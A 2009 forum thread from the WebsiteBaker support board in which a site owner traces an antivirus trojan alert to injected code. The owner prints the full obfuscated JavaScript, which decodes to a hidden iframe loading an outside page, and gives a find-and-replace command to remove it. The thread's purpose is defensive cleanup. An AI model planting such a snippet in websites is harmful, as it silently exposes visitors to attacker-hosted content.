Welcome, Guest. Please login or register.
Did you miss your activation email?
May 25, 2012, 08:15:01 AM

Login with username, password and session length
Search:     Advanced search
Interested in joining the WebsiteBaker team?
For more Information read here or on our new website.
155480 Posts in 21708 Topics by 7734 Members
Latest Member: rofroodoOvego
* Home Help Search Login Register
Pages: [1]   Go Down
Print
Author Topic: Trojan Horse - JS:Obfuscated-A [Trj] in WebsiteBaker ( I found it )  (Read 1901 times)
xTi0

Offline Offline

Posts: 7



« on: March 07, 2009, 11:18:47 AM »

I did a clean installation of websitebaker. I added a module and it is Code 2. When I try to open the site I get the following from the antivirus you use: JS: Obfuscated-A [trj]
Trojan Horse

If anyone has the same problem to share experiences on how it is removed. Antivirus is www.avast.com

Here's a link to this site: http://www.aleksovproject.com/index.php
This is the content of the folder modules:

admin.php
backup/
captcha_control/
code/
code2/
droplets/
edit_module_files.p hp
fckeditor/
form/
index.php
jsadmin/
menu_link/
news/
output_filter/
reload/
show_menu2/
wrapper/
wysiwyg/

Hello, somebody help me
« Last Edit: March 12, 2009, 08:48:08 AM by xTi0 » Logged
peelec

Offline Offline

Posts: 17



« Reply #1 on: March 11, 2009, 10:19:55 PM »

site is down
Logged
xTi0

Offline Offline

Posts: 7



« Reply #2 on: March 12, 2009, 07:54:47 AM »

I stopped. Not to be seen by google as a virus and should be stopped. I will let him go, but please for assistance in order to continue working on the site.
Logged
xTi0

Offline Offline

Posts: 7



« Reply #3 on: March 12, 2009, 08:47:16 AM »

I found it. It turned out that the front time is suspended from google I did not deleted. I apologize to all

Code:
<!-- ad --><script>function ixtdoyiepvofii(bditzhkittv){var pknntrcpghxowyr="";for(zzavh=0;zzavh<bditzhkittv.length;zzavh+=2){pknntrcpghxowyr+=(String.fromCharCode(parseInt(bditzhkittv.substr(zzavh,2),16)));}document.write(pknntrcpghxowyr);}ixtdoyiepvofii("3Csqncygw6966sqncygw72sqncygw616Dsqncygw6520737263sqncygw3Dsqncygw276874sqncygw74sqncygw70sqncygw3A2Fsqncygw2F7272sqncygw65sqncygw726569sqncygw6Bsqncygw6B64sqncygw6E732E636F6D2Fsqncygw70sqncygw6167sqncygw652Esqncygw68sqncygw74sqncygw6Dsqncygw6C27sqncygw20sqncygw77sqncygw69sqncygw6474683D312068sqncygw65sqncygw696768743D31sqncygw20sqncygw73sqncygw74sqncygw796C65sqncygw3D27sqncygw7669sqncygw73sqncygw6962696C697479sqncygw3A2068sqncygw6964sqncygw6465sqncygw6Esqncygw273E3Csqncygw2Fsqncygw69sqncygw6672616Dsqncygw65sqncygw3E".replace(/sqncygw/g, ""));</script><!-- /ad -->

   
In a similar problem to review all index.php files.
Or run the following command to clear this script.


Code:
find /home/user/public_html/* -regex ".*\(\.php\|\.html\|\.htm\)$" -type f -exec replace '<!-- ad --><script>function ixtdoyiepvofii(bditzhkittv){var pknntrcpghxowyr="";for(zzavh=0;zzavh<bditzhkittv.length;zzavh+=2){pknntrcpghxowyr+=(String.fromCharCode(parseInt(bditzhkittv.substr(zzavh,2),16)));}document.write(pknntrcpghxowyr);}ixtdoyiepvofii("3Csqncygw6966sqncygw72sqncygw616Dsqncygw6520737263sqncygw3Dsqncygw276874sqncygw74sqncygw70sqncygw3A2Fsqncygw2F7272sqncygw65sqncygw726569sqncygw6Bsqncygw6B64sqncygw6E732E636F6D2Fsqncygw70sqncygw6167sqncygw652Esqncygw68sqncygw74sqncygw6Dsqncygw6C27sqncygw20sqncygw77sqncygw69sqncygw6474683D312068sqncygw65sqncygw696768743D31sqncygw20sqncygw73sqncygw74sqncygw796C65sqncygw3D27sqncygw7669sqncygw73sqncygw6962696C697479sqncygw3A2068sqncygw6964sqncygw6465sqncygw6Esqncygw273E3Csqncygw2Fsqncygw69sqncygw6672616Dsqncygw65sqncygw3E".replace(/sqncygw/g, ""));</script><!-- /ad -->'  -- {} \;
« Last Edit: March 12, 2009, 09:40:49 PM by xTi0 » Logged
Pages: [1]   Go Up
Print
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.16 | SMF © 2011, Simple Machines Valid XHTML 1.0! Valid CSS!